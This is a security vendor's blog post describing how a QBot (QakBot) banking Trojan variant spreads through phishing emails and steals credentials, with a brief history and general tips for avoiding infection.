---
title: "How Is The Latest QakBot Variant QBot Infecting Electronic Devices? | Phish Protection"
description: "QBot -also referred to as QakBot- is a polymorphic Trojan that has been designed to steal financial information from the computer devices it infects."
image: "https://phishprotection.com/og/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices.png"
canonical: "https://phishprotection.com/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices/"
---

Quick Answer

QBot -also referred to as QakBot- is a polymorphic \_Trojan that has been designed to steal financial information from the computer devices it infects\_. A Trojan malware is one which has capabilities to replicate itself, but QBot is exceptional in the sense that this Trojan can undergo sophisticated modification to provide attackers with enhanced capabilities and can then be spread through either networks or removable storage devices.

Share 

[ ](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fphishprotection.com%2Fblog%2Fhow-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices%2F "Share on LinkedIn") [ ](https://twitter.com/intent/tweet?text=How%20Is%20The%20Latest%20QakBot%20Variant%20QBot%20Infecting%20Electronic%20Devices%3F&url=https%3A%2F%2Fphishprotection.com%2Fblog%2Fhow-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices%2F "Share on X/Twitter") [ ](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fphishprotection.com%2Fblog%2Fhow-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices%2F "Share on Facebook") [ ](https://reddit.com/submit?url=https%3A%2F%2Fphishprotection.com%2Fblog%2Fhow-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices%2F&title=How%20Is%20The%20Latest%20QakBot%20Variant%20QBot%20Infecting%20Electronic%20Devices%3F "Share on Reddit") [ ](mailto:?subject=How%20Is%20The%20Latest%20QakBot%20Variant%20QBot%20Infecting%20Electronic%20Devices%3F&body=Check out this article: https%3A%2F%2Fphishprotection.com%2Fblog%2Fhow-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices%2F "Share via Email") 

![Phish Protection blog post image](https://media.mailhop.org/phishprotection/images/2019/05/phishing-attack-prevention-7674.jpg) 

QBot -also referred to as QakBot- is a polymorphic _Trojan that has been designed to steal financial information from the computer devices it infects_. A Trojan malware is one which has capabilities to replicate itself, but QBot is exceptional in the sense that this Trojan can undergo sophisticated modification to provide attackers with enhanced capabilities and can then be spread through either networks or removable storage devices.

The research activity carried out by Varonis recently exposed a global [QBot Cyber Campaign](https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.html). It was found that the C2 Server actively compromised thousands of victims around the globe. The primary targets of these attacks were US Corporations. However, it has also hit networks around the world with victims from Asia, South America, and Europe. The goal of these **cyber-attacks** was to steal financial information from the victim including bank account details. In the report, it is mentioned that threat actors used a new variant of QBot.

![Phishing attack prevention](https://media.mailhop.org/phishprotection/images/2019/05/phishing-attack-prevention-7674.jpg) 

#### How The New Variant Of QBot Works:

In a typical attack by this new variant of QBot which exploits the vulnerabilities in targeted system stealthily. _The victim receives an email containing a link to OneDrive that then delivers a file with .doc or .vbs extension upon accidentally or intentionally clicking upon it._

QBot steals information, downloads harmful files and opens up a backdoor on the compromised machine. Although it has been around for years now, this particular Trojan has recently resurfaced again in a new version which has [enhanced capabilities](https://threatpost.com/qbot-malware-morphs-quickly-to-evade-detection/117377/) and a new phishing based method that can bypass anti-malware software such as anti-viruses, **spam filters** etc.

VBS files (Visual Basic script files) are classified as source code and program files for Windows PCs. The email received is quite malignant and appears to be an existing email thread. This is a\*\* social engineering\*\* tactic intended to lure the victims so that they open the file attached to the email. Once executed, the file extracts the OS version of the victim and then starts downloading the QBot loader using Windows BITSAdmin ( a tool that can create download or upload jobs and monitor their progress). Previous [variants of QBot](https://medium.com/@Alibaba%5FCloud/the-qakbot-family-extends-introducing-a-new-qbot-variant-700155a4af5) were different in that they were found to be using Windows PowerShell.

According to Varonis, the loader has multiple versions that keep getting updated even after execution. _A “valid digital certificate” is included in it and help ensure that the file is trustworthy and induces fewer warnings in Windows._

Veronis found out that each version of the loader is signed with a different digital certificate. Once installed, the malware starts creating scheduled tasks and adds entries to the Windows system registry. The malware launches a process into explorer.exe and then overwrites the original executable with a 32-bit calc.exe version. Here is a list of the techniques used by QBot to steal information:\_ \_

- _Keylogging_
- _Hooking_
- _Credentials/cookies etc._

The goal of the malware is to steal sensitive and confidential information, and cyber-criminals can draw off money from the user’s account once it is compromised in further attack escalation stages.

#### A Brief History: The Presence of QBot & Impact

Let us now have a quick look at the history of QBot. QBot (also known as QakBot) is a banking Trojan that was first identified in 2009\. _The QBot malware is known for its ability to evade detection_. It is challenging to spot the malware and even harder to eliminate it.

Cybercriminals have found its design convenient, like the ever-present AK-47 of the cyber world, and have continued to engineer and modify the malware, making it harder for security researchers & security services to detect it. The malware has previously targeted several governments and corporations around the world for stealing user information and banking credentials.

QBot has reappeared many times since 2009\. For example- _it infected almost 500,000 PCs in 2014 to steal their financial data_. In 2016, a new variant of the malware infected more than 50,000 systems from different organizations around the world. It has also recently managed to infect cybersecurity vendors with its attacks.

![Protection from phishing](https://media.mailhop.org/phishprotection/images/2019/05/protection-from-phishing-7677.jpg) 

#### How To Keep Your PC Safe From QBot?

If you are worried about getting infected by the QBot Malware, then you can use these helpful tips below to keep yourself and your devices safe. To avoid getting infected by QBot malware, we recommend users to:

- Keep your Operating system updated and avoid using Windows OS versions that have stopped getting support from Microsoft such as Windows XP.
- Always keep your Operating System up-to-date, and regularly update your third-party software.
- Disable Java from your system if you do not use it quite often.
- Never click on any URL in a suspicious email received in your inbox else use advanced threat defense from [phishprotection.com](/) for email protection.
- Do not download or open any suspected attachments from email or from anywhere on the web

**References:**

- “Varonis Exposes Global Cyber Campaign”

[https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-QBot/](https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/)

- “QBot Malware resurfaces in new attack against businesses”

(Lucian Constantin- Mar 1, 2019)

[https://www.csoonline.com/article/3345972/QBot-malware-resurfaces-in-new-attack-against-businesses.amp.html](https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.amp.html)

## Topics

[ Cybersecurity ](/tags/cybersecurity/) 

![Brad Slavin](https://media.mailhop.org/phishprotection/images/authors/brad-slavin.jpg) 

[ Brad Slavin ](/authors/brad-slavin/) 

General Manager

Founder and General Manager of DuoCircle. Product strategy and commercial lead across DuoCircle's 2,000+ customer base.

[LinkedIn Profile →](https://www.linkedin.com/in/bradslavin) 

## Protect your inbox from phishing attacks

Real-time email security with 60-day free trial. No credit card required.

[Start Free Trial](https://portal.duocircle.com/cart.php?a=add&pid=101&brand=phishprotection) [View Pricing](/pricing/) 

## Related Articles

[  Intermediate 3m  13,000 Singapore-based students affected as a threat actor hacked into their devices!  Aug 16, 2024 ](/blog/13000-singapore-based-students-affected-as-a-threat-actor-hacked-into-their-devices/)[  Intermediate 3m  The 2024 Multi-Nation Elections Need to Steer Clear of Highly Potent Cyber Menaces  May 9, 2024 ](/blog/2024-multi-nation-elections-cyber-threats-stay-vigilant/)[  Intermediate 6m  7 Commonly Overlooked But Crucial Security Threats That You Might be Ignoring  Feb 6, 2023 ](/blog/7-commonly-overlooked-but-crucial-security-threats-that-you-might-be-ignoring/)[  Intermediate 17m  9+ Cybersecurity Software Solutions For Businesses To Use  May 30, 2022 ](/blog/9-cybersecurity-software-solutions-businesses/)

```json
{"@context":"https://schema.org","@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com","logo":{"@type":"ImageObject","url":"https://phishprotection.com/images/phishprotection-logo.png"},"description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://github.com/duocircle"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://phishprotection.com/contact/"},"knowsAbout":["Phishing Protection","Email Security","Anti-Phishing","Business Email Compromise","Ransomware Protection","Time of Click Protection","Office 365 Email Security","Advanced Threat Defense"]}
```

```json
{"@context":"https://schema.org","@type":"WebSite","name":"Phish Protection","url":"https://phishprotection.com","description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","publisher":{"@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com","logo":{"@type":"ImageObject","url":"https://phishprotection.com/images/phishprotection-logo.png"},"description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]}}}
```

```json
{"@context":"https://schema.org","@type":"BlogPosting","headline":"How Is The Latest QakBot Variant QBot Infecting Electronic Devices?","description":"QBot -also referred to as QakBot- is a polymorphic Trojan that has been designed to steal financial information from the computer devices it infects.","url":"https://phishprotection.com/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices/","datePublished":"2019-05-03T10:28:24.000Z","dateModified":"2026-04-17T15:43:10.000Z","dateCreated":"2019-05-03T10:28:24.000Z","author":{"@type":"Person","@id":"https://phishprotection.com/authors/brad-slavin/#person","name":"Brad Slavin","url":"https://phishprotection.com/authors/brad-slavin/","jobTitle":"General Manager","description":"Brad Slavin is the founder and General Manager of DuoCircle, the company behind DMARC Report, AutoSPF, Phish Protection, and Mailhop. He founded DuoCircle in 2014 and has led the company's growth to 2,000+ customers across its email security product family. Brad's focus is product strategy, customer relationships, and the commercial and compliance side of email authentication (DPAs, SLAs, enterprise procurement).","image":"https://media.mailhop.org/phishprotection/images/authors/brad-slavin.jpg","knowsAbout":["Email Security Strategy","SaaS Product Management","Enterprise Compliance","Customer Success","Email Deliverability Business"],"worksFor":{"@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com"},"sameAs":["https://www.linkedin.com/in/bradslavin"]},"publisher":{"@type":"Organization","name":"Phish Protection","url":"https://phishprotection.com","logo":{"@type":"ImageObject","url":"https://phishprotection.com/images/phishprotection-logo.png"},"description":"Advanced phishing protection and email security for businesses. Real-time threat defense, time-of-click protection, and seamless Office 365 integration.","parentOrganization":{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138883901","name":"DuoCircle LLC","url":"https://www.duocircle.com","sameAs":["https://www.wikidata.org/wiki/Q138883901","https://www.crunchbase.com/organization/duocircle-llc","https://www.linkedin.com/company/duocircle","https://github.com/duocircle"],"subOrganization":[{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138898167","name":"DMARC Report","url":"https://dmarcreport.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897474","name":"AutoSPF","url":"https://autospf.com"},{"@type":"Organization","@id":"https://www.wikidata.org/wiki/Q138897912","name":"Phish Protection","url":"https://www.phishprotection.com"}]},"sameAs":["https://www.linkedin.com/company/duocircle","https://x.com/duocirclellc","https://www.facebook.com/duocirclellc","https://github.com/duocircle"],"contactPoint":{"@type":"ContactPoint","contactType":"customer support","url":"https://phishprotection.com/contact/"},"knowsAbout":["Phishing Protection","Email Security","Anti-Phishing","Business Email Compromise","Ransomware Protection","Time of Click Protection","Office 365 Email Security","Advanced Threat Defense"]},"mainEntityOfPage":{"@type":"WebPage","@id":"https://phishprotection.com/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices/"},"articleSection":"intermediate","keywords":"Cybersecurity","wordCount":842,"image":{"@type":"ImageObject","url":"https://media.mailhop.org/phishprotection/images/2019/05/phishing-attack-prevention-7674.jpg","caption":"Phish Protection blog post image","width":1200,"height":630},"speakable":{"@type":"SpeakableSpecification","cssSelector":[".answer-block","h1"]}}
```

```json
{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://phishprotection.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://phishprotection.com/blog/"},{"@type":"ListItem","position":3,"name":"Intermediate","item":"https://phishprotection.com/intermediate/"},{"@type":"ListItem","position":4,"name":"How Is The Latest QakBot Variant QBot Infecting Electronic Devices?","item":"https://phishprotection.com/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices/"}]}
```